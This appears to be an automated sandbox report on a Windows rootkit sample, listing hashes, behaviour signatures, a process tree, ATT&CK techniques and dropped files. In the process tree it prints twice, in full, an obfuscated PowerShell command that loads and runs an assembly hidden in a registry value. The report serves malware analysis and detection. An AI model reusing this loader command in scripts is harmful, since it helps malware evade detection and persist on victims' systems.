Analysis

  • max time kernel
    173s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20231020-en
  • resource tags

    arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
  • submitted
    08-11-2023 03:15

General

  • Target

    Rootkits/22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe

  • Size

    327KB

  • MD5

    da87a0a2aba605908bf8b9a3f4377481

  • SHA1

    5cac4ea0b3f0cc2d7c04655db12ad0443cbaa5cf

  • SHA256

    22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4

  • SHA512

    55a8a27a013cb2c3deda81779d89ab956a5f57d00a155496abc7bf3c5a87f3b7c41058ab3681cbbd0406f69ea01c4ffc3e5779c2ca676088a68cb87f19c34c28

  • SSDEEP

    6144:RBx7z3Bre16M01nguKBmmlbvx0zKGkl5EiCtuhNjtANJ4tDWhRaitlopYR:RnBreIfKNJVZotuhNZKxrYpI

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Drops file in System32 directory 18 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 9 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:484
    • C:\Windows\system32\services.exe
      C:\Windows\system32\services.exe
      1⤵
        PID:468
        • C:\Windows\system32\sppsvc.exe
          C:\Windows\system32\sppsvc.exe
          2⤵
            PID:2100
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
            2⤵
              PID:1916
            • C:\Windows\system32\taskhost.exe
              "taskhost.exe"
              2⤵
                PID:1120
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
                2⤵
                  PID:1044
                • C:\Windows\System32\spoolsv.exe
                  C:\Windows\System32\spoolsv.exe
                  2⤵
                    PID:620
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k NetworkService
                    2⤵
                      PID:276
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalService
                      2⤵
                        PID:980
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs
                        2⤵
                        • Drops file in Windows directory
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:856
                        • C:\Windows\system32\taskeng.exe
                          taskeng.exe {CE7F4F92-C94C-4DA0-A91D-BF3B41535D64} S-1-5-18:NT AUTHORITY\System:Service:
                          3⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2240
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                            4⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2476
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                            4⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2040
                        • C:\Windows\system32\wbem\WMIADAP.EXE
                          wmiadap.exe /F /T /R
                          3⤵
                          • Drops file in System32 directory
                          • Drops file in Windows directory
                          PID:1556
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
                        2⤵
                          PID:816
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
                          2⤵
                          • Modifies security service
                          PID:744
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k RPCSS
                          2⤵
                            PID:672
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k DcomLaunch
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:604
                            • C:\Windows\system32\wbem\wmiprvse.exe
                              C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                              3⤵
                                PID:2196
                          • C:\Windows\system32\winlogon.exe
                            winlogon.exe
                            1⤵
                              PID:424
                              • C:\Windows\System32\dllhost.exe
                                C:\Windows\System32\dllhost.exe /Processid:{efcee286-0917-4c2b-be22-cfc7d5874deb}
                                2⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of WriteProcessMemory
                                PID:2624
                              • C:\Windows\SysWOW64\dllhost.exe
                                C:\Windows\SysWOW64\dllhost.exe /Processid:{2d979e1c-69cf-4fb8-b988-5c2b27bb2510}
                                2⤵
                                  PID:3036
                              • C:\Windows\Explorer.EXE
                                C:\Windows\Explorer.EXE
                                1⤵
                                • Suspicious behavior: GetForegroundWindowSpam
                                PID:1232
                                • C:\Users\Admin\AppData\Local\Temp\Rootkits\22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Rootkits\22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe"
                                  2⤵
                                  • Drops file in Windows directory
                                  PID:2224
                              • C:\Windows\system32\Dwm.exe
                                "C:\Windows\system32\Dwm.exe"
                                1⤵
                                  PID:1188
                                • C:\Windows\system32\lsm.exe
                                  C:\Windows\system32\lsm.exe
                                  1⤵
                                    PID:492
                                  • C:\Windows\system32\conhost.exe
                                    \??\C:\Windows\system32\conhost.exe "-2060891418-230511156-1170334656-1869851449139127007320924644454270518992071997409"
                                    1⤵
                                      PID:2724

                                    Network

                                    MITRE ATT&CK Matrix ATT&CK v13

                                    Persistence

                                    Create or Modify System Process

                                    1
                                    T1543

                                    Windows Service

                                    1
                                    T1543.003

                                    Privilege Escalation

                                    Create or Modify System Process

                                    1
                                    T1543

                                    Windows Service

                                    1
                                    T1543.003

                                    Defense Evasion

                                    Modify Registry

                                    1
                                    T1112

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Windows\System32\perfc007.dat
                                      Filesize

                                      141KB

                                      MD5

                                      0f3d76321f0a7986b42b25a3aa554f82

                                      SHA1

                                      7036bba62109cc25da5d6a84d22b6edb954987c0

                                      SHA256

                                      dfad62e3372760d303f7337fe290e4cb28e714caadd3c59294b77968d81fe460

                                      SHA512

                                      bb02a3f14d47d233fbda046f61bbf5612ebc6213b156af9c47f56733a03df1bb484d1c3576569eb4499d7b378eb01f4d6e906c36c6f71738482584c2e84b47d0

                                    • C:\Windows\System32\perfc00A.dat
                                      Filesize

                                      150KB

                                      MD5

                                      540138285295c68de32a419b7d9de687

                                      SHA1

                                      1cf6a2a0f53f0516ff9fe5ac733dbb5a9255ae56

                                      SHA256

                                      33867c52f756f2b0f645f4bd503c65969d73676dcb14e6a6fdb2ffb11c7562eb

                                      SHA512

                                      7c17c10d4b6165aa0c208811dc6d98e2f4e75e3da1cc2313cc7da9d657626beb3e4ec00b07b71376a7c549725d40db20d8952753e70acc86e87a8390e224a64a

                                    • C:\Windows\System32\perfc00C.dat
                                      Filesize

                                      141KB

                                      MD5

                                      831dbe568992299e589143ee8898e131

                                      SHA1

                                      737726173aab8b76fe1f98104d72bb91abd273bf

                                      SHA256

                                      4f22ef1625fb2a2370779d0992f80b8e5e5da8dc727aa99ade152044d28e9405

                                      SHA512

                                      39015d29d593c9df59cdafbff95a6ddc000a5dbf767665b65f8ec65751e70315918c93d3583b922d32e9b6261b8c07023da660098ca79c5420b782c150b5c139

                                    • C:\Windows\System32\perfc010.dat
                                      Filesize

                                      138KB

                                      MD5

                                      cf82e7354e591c1408eb2cc0e29dd274

                                      SHA1

                                      7e91bd50c3e6b64b81e2b5c1ce723f52e34748e9

                                      SHA256

                                      59b5e6fbbe68f47db14a3c045b0ac1abb026c626ca4bee708fbd3940e6d2e06d

                                      SHA512

                                      98bd4809c1c418be4100096bc9df328d2ad435c5615c082fa2bfa424935203107015862cd9c1737800b7f7bd020fea4538c325707927c1557bc3efebffb27620

                                    • C:\Windows\System32\perfc011.dat
                                      Filesize

                                      114KB

                                      MD5

                                      1f998386566e5f9b7f11cc79254d1820

                                      SHA1

                                      e1da5fe1f305099b94de565d06bc6f36c6794481

                                      SHA256

                                      1665d97fb8786b94745295feb616a30c27af84e8a5e1d25cd1bcaf70723040ea

                                      SHA512

                                      a7c9702dd5833f4d6d27ce293efb9507948a3b05db350fc9909af6a48bd649c7578f856b4d64d87df451d0efbe202c62da7fffcac03b3fe72c7caaea553de75f

                                    • C:\Windows\System32\perfh007.dat
                                      Filesize

                                      668KB

                                      MD5

                                      5026297c7c445e7f6f705906a6f57c02

                                      SHA1

                                      4ec3b66d44b0d44ec139bd1475afd100748f9e91

                                      SHA256

                                      506d3bec72805973df3b2e11aba4d074aeb4b26b7335536e79ea1145108817cc

                                      SHA512

                                      5be8e51ecacda465b905df3e38ac114240d8fa6bae5bb17e8e53a87630454b57514ca0abbd8afefd798d450cd4ee89caf4391eeb837ced384260c188482fb48d

                                    • C:\Windows\System32\perfh009.dat
                                      Filesize

                                      634KB

                                      MD5

                                      1c678ee06bd02b5d9e4d51c3a4ec2d2b

                                      SHA1

                                      90aa7fdfaaa37fb4f2edfc8efc3994871087dedb

                                      SHA256

                                      2d168ab31836a08d8ca00aab9685f040aac4052a7f10fbbf0c28e9f880a79dd3

                                      SHA512

                                      ec665d7a20f27b2a0fe2475883009c6d34615cc2046d096de447ef57bcac9da0ae842be0556f5736f42d9c1c601fb8629896a2444990e508f7c573165088ab32

                                    • C:\Windows\System32\perfh00A.dat
                                      Filesize

                                      715KB

                                      MD5

                                      340af83514a525c50ffbbf8475ed62b7

                                      SHA1

                                      e2f382ae75afe7df8a323320bbb2aafa1ff6e407

                                      SHA256

                                      fb298e9a90476b4698def395a8ee1974c1cee3959b658662c730da915caea417

                                      SHA512

                                      8236aab579456ef4614ddd5fbfe72d0b0b26617c43a9cd53c3de56d3ac052eee8ca7d70749aaca0692855ecd4fd5f1460ac0b1dd30481dee519b910755c1cc2d

                                    • C:\Windows\System32\perfh00C.dat
                                      Filesize

                                      715KB

                                      MD5

                                      718bb9564980029a2e3341093a4bb082

                                      SHA1

                                      8953d96e47b65c2c70f2bcc3d9e2e7c55d41ee61

                                      SHA256

                                      ad7b5314ef00ce846ae2c91a32dd1c1f2b4905cf182005e251ad6d4af66cc977

                                      SHA512

                                      3f22961d108271dc098ae2c75d217991da38c18a587b44abd74da853ea26d171ca1a507c3200f3b7c2a8175bfff5a8b968a551a4804082064dc6f2ef98b5432d

                                    • C:\Windows\System32\perfh010.dat
                                      Filesize

                                      710KB

                                      MD5

                                      66fd0e1999023d23c9f8e3cd7a92af77

                                      SHA1

                                      e0e61df319ddbc7c9d425612295f825c47888658

                                      SHA256

                                      bdbadcf6f408c6d223974d52a69413aebe1d50ac7eaeacefa2beb2f7321355d0

                                      SHA512

                                      b8924cdf53eb5589820a16890fa7abdca20dfc3ca44063d3fdaef484f506419dbf9cd660bc80e8dfe7b7eba7d9db8fe0046accc1fca8d3faf70dedfa1ee0e68f

                                    • C:\Windows\System32\perfh011.dat
                                      Filesize

                                      394KB

                                      MD5

                                      24da30cbb5f0fe4939862880e72cc32c

                                      SHA1

                                      9132497736f52dae62b79be1677c05e32a7ba2ab

                                      SHA256

                                      a11a4228f8485db2f90466651f6cab07245a8ff5b3448636ab0abc4d618a4a1f

                                      SHA512

                                      332a57e8f0e8d7f82044f90388afd7509768ecb3f657c6be12d1f51ec1c66b8886c30d4b4a42d3a64c3e0d8b76d7cc86a1ac3b92713a68a62c12fdae6a77d6c2

                                    • C:\Windows\System32\wbem\Performance\WmiApRpl.h
                                      Filesize

                                      3KB

                                      MD5

                                      b133a676d139032a27de3d9619e70091

                                      SHA1

                                      1248aa89938a13640252a79113930ede2f26f1fa

                                      SHA256

                                      ae2b6236d3eeb4822835714ae9444e5dcd21bc60f7a909f2962c43bc743c7b15

                                      SHA512

                                      c6b99e13d854ce7a6874497473614ee4bd81c490802783db1349ab851cd80d1dc06df8c1f6e434aba873a5bbf6125cc64104709064e19a9dc1c66dcde3f898f5

                                    • C:\Windows\System32\wbem\Performance\WmiApRpl.ini
                                      Filesize

                                      27KB

                                      MD5

                                      46d08e3a55f007c523ac64dce6dcf478

                                      SHA1

                                      62edf88697e98d43f32090a2197bead7e7244245

                                      SHA256

                                      5b15b1fc32713447c3fbc952a0fb02f1fd78c6f9ac69087bdb240625b0282614

                                      SHA512

                                      b1f42e70c0ba866a9ed34eb531dbcbae1a659d7349c1e1a14b18b9e23d8cbd302d8509c6d3a28bc7509dd92e83bcb400201fb5d5a70f613421d81fe649d02e42

                                    • C:\Windows\Tasks\dialersvc32.job
                                      Filesize

                                      1KB

                                      MD5

                                      ba2873efd5be2dda4036edf3feaf3ae8

                                      SHA1

                                      5bd051e9dea1b2f66feba5a471c9e4579eac5391

                                      SHA256

                                      30e362d28b0ccf701f13f6661e9a48de1ad06422bff07f53f1f2c03ba2046937

                                      SHA512

                                      c69a6f92408728c8e222bdd38d91699328f7512f1dd334ebe1b9e80f73c18c9fc9985d11816d68fd43dbf90f7838586b0158f70aa274f3555b170839d97565e2

                                    • memory/276-118-0x00000000008E0000-0x000000000090A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/424-42-0x000007FEBDAA0000-0x000007FEBDAB0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/424-43-0x0000000036F90000-0x0000000036FA0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/424-38-0x00000000007A0000-0x00000000007C3000-memory.dmp
                                      Filesize

                                      140KB

                                    • memory/424-40-0x00000000007A0000-0x00000000007C3000-memory.dmp
                                      Filesize

                                      140KB

                                    • memory/424-41-0x0000000000860000-0x000000000088A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/424-47-0x0000000000860000-0x000000000088A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/424-48-0x0000000076FA1000-0x0000000076FA2000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/468-51-0x000007FEBDAA0000-0x000007FEBDAB0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/468-58-0x00000000009A0000-0x00000000009CA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/468-50-0x00000000009A0000-0x00000000009CA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/468-52-0x0000000036F90000-0x0000000036FA0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/484-61-0x0000000000110000-0x000000000013A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/484-62-0x0000000036F90000-0x0000000036FA0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/484-218-0x0000000000110000-0x000000000013A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/484-60-0x000007FEBDAA0000-0x000007FEBDAB0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/484-57-0x0000000000110000-0x000000000013A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/492-71-0x0000000036F90000-0x0000000036FA0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/492-70-0x00000000004B0000-0x00000000004DA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/492-66-0x00000000004B0000-0x00000000004DA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/492-247-0x00000000004B0000-0x00000000004DA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/492-67-0x000007FEBDAA0000-0x000007FEBDAB0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/604-72-0x0000000000500000-0x000000000052A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/604-76-0x0000000000500000-0x000000000052A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/604-73-0x000007FEBDAA0000-0x000007FEBDAB0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/604-248-0x0000000000500000-0x000000000052A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/604-80-0x0000000036F90000-0x0000000036FA0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/620-147-0x0000000001C20000-0x0000000001C4A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/672-75-0x0000000000490000-0x00000000004BA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/672-77-0x000007FEBDAA0000-0x000007FEBDAB0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/672-83-0x0000000000490000-0x00000000004BA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/672-79-0x0000000036F90000-0x0000000036FA0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/744-96-0x00000000009C0000-0x00000000009EA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/744-139-0x0000000036F90000-0x0000000036FA0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/816-143-0x0000000036F90000-0x0000000036FA0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/816-98-0x0000000000830000-0x000000000085A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/856-107-0x0000000000A30000-0x0000000000A5A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/980-95-0x00000000008D0000-0x00000000008FA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/980-97-0x000007FEBDAA0000-0x000007FEBDAB0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/1044-184-0x0000000036F90000-0x0000000036FA0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/1044-155-0x00000000001C0000-0x00000000001EA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1120-151-0x0000000001D90000-0x0000000001DBA000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1188-158-0x0000000001AF0000-0x0000000001B1A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1188-187-0x0000000036F90000-0x0000000036FA0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/1232-165-0x0000000036F90000-0x0000000036FA0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/1232-162-0x0000000002B50000-0x0000000002B7A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1556-219-0x0000000036F90000-0x0000000036FA0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/1556-213-0x00000000001E0000-0x000000000020A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1556-217-0x0000000076F50000-0x00000000770F9000-memory.dmp
                                      Filesize

                                      1.7MB

                                    • memory/1556-215-0x0000000000210000-0x000000000023A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1916-169-0x0000000000850000-0x000000000087A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/1916-173-0x0000000036F90000-0x0000000036FA0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2040-27-0x0000000073B60000-0x000000007410B000-memory.dmp
                                      Filesize

                                      5.7MB

                                    • memory/2040-200-0x0000000001170000-0x00000000011B0000-memory.dmp
                                      Filesize

                                      256KB

                                    • memory/2040-32-0x0000000001170000-0x00000000011B0000-memory.dmp
                                      Filesize

                                      256KB

                                    • memory/2040-181-0x0000000001170000-0x00000000011B0000-memory.dmp
                                      Filesize

                                      256KB

                                    • memory/2040-135-0x0000000073B60000-0x000000007410B000-memory.dmp
                                      Filesize

                                      5.7MB

                                    • memory/2040-34-0x0000000001170000-0x00000000011B0000-memory.dmp
                                      Filesize

                                      256KB

                                    • memory/2040-37-0x0000000001170000-0x00000000011B0000-memory.dmp
                                      Filesize

                                      256KB

                                    • memory/2040-23-0x0000000073B60000-0x000000007410B000-memory.dmp
                                      Filesize

                                      5.7MB

                                    • memory/2100-176-0x00000000001F0000-0x000000000021A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/2100-179-0x0000000036F90000-0x0000000036FA0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2196-250-0x0000000076F50000-0x00000000770F9000-memory.dmp
                                      Filesize

                                      1.7MB

                                    • memory/2196-249-0x0000000000130000-0x000000000015A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/2196-256-0x0000000076F50000-0x00000000770F9000-memory.dmp
                                      Filesize

                                      1.7MB

                                    • memory/2196-254-0x0000000076F50000-0x00000000770F9000-memory.dmp
                                      Filesize

                                      1.7MB

                                    • memory/2196-252-0x0000000076F50000-0x00000000770F9000-memory.dmp
                                      Filesize

                                      1.7MB

                                    • memory/2196-251-0x0000000076F50000-0x00000000770F9000-memory.dmp
                                      Filesize

                                      1.7MB

                                    • memory/2240-199-0x0000000076F50000-0x00000000770F9000-memory.dmp
                                      Filesize

                                      1.7MB

                                    • memory/2240-197-0x0000000000870000-0x000000000089A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/2240-202-0x0000000076F50000-0x00000000770F9000-memory.dmp
                                      Filesize

                                      1.7MB

                                    • memory/2476-18-0x0000000000F10000-0x0000000000F50000-memory.dmp
                                      Filesize

                                      256KB

                                    • memory/2476-10-0x0000000019D80000-0x000000001A062000-memory.dmp
                                      Filesize

                                      2.9MB

                                    • memory/2476-11-0x00000000008B0000-0x00000000008B8000-memory.dmp
                                      Filesize

                                      32KB

                                    • memory/2476-12-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
                                      Filesize

                                      9.6MB

                                    • memory/2476-13-0x0000000001220000-0x00000000012A0000-memory.dmp
                                      Filesize

                                      512KB

                                    • memory/2476-14-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
                                      Filesize

                                      9.6MB

                                    • memory/2476-29-0x0000000076F50000-0x00000000770F9000-memory.dmp
                                      Filesize

                                      1.7MB

                                    • memory/2476-15-0x0000000001220000-0x00000000012A0000-memory.dmp
                                      Filesize

                                      512KB

                                    • memory/2476-16-0x0000000001220000-0x00000000012A0000-memory.dmp
                                      Filesize

                                      512KB

                                    • memory/2476-17-0x0000000001220000-0x00000000012A0000-memory.dmp
                                      Filesize

                                      512KB

                                    • memory/2476-26-0x000007FEF5640000-0x000007FEF5FDD000-memory.dmp
                                      Filesize

                                      9.6MB

                                    • memory/2476-31-0x0000000076D30000-0x0000000076E4F000-memory.dmp
                                      Filesize

                                      1.1MB

                                    • memory/2476-19-0x0000000076F50000-0x00000000770F9000-memory.dmp
                                      Filesize

                                      1.7MB

                                    • memory/2476-20-0x0000000076D30000-0x0000000076E4F000-memory.dmp
                                      Filesize

                                      1.1MB

                                    • memory/2624-21-0x0000000140000000-0x0000000140042000-memory.dmp
                                      Filesize

                                      264KB

                                    • memory/2624-24-0x0000000140000000-0x0000000140042000-memory.dmp
                                      Filesize

                                      264KB

                                    • memory/2624-201-0x0000000076F50000-0x00000000770F9000-memory.dmp
                                      Filesize

                                      1.7MB

                                    • memory/2624-195-0x00000000002E0000-0x000000000030A000-memory.dmp
                                      Filesize

                                      168KB

                                    • memory/2624-35-0x0000000076F50000-0x00000000770F9000-memory.dmp
                                      Filesize

                                      1.7MB

                                    • memory/2624-25-0x0000000076F50000-0x00000000770F9000-memory.dmp
                                      Filesize

                                      1.7MB

                                    • memory/2624-30-0x0000000140000000-0x0000000140042000-memory.dmp
                                      Filesize

                                      264KB

                                    • memory/2624-28-0x0000000076D30000-0x0000000076E4F000-memory.dmp
                                      Filesize

                                      1.1MB

                                    • memory/2724-193-0x0000000036F90000-0x0000000036FA0000-memory.dmp
                                      Filesize

                                      64KB

                                    • memory/2724-190-0x0000000000720000-0x000000000074A000-memory.dmp
                                      Filesize

                                      168KB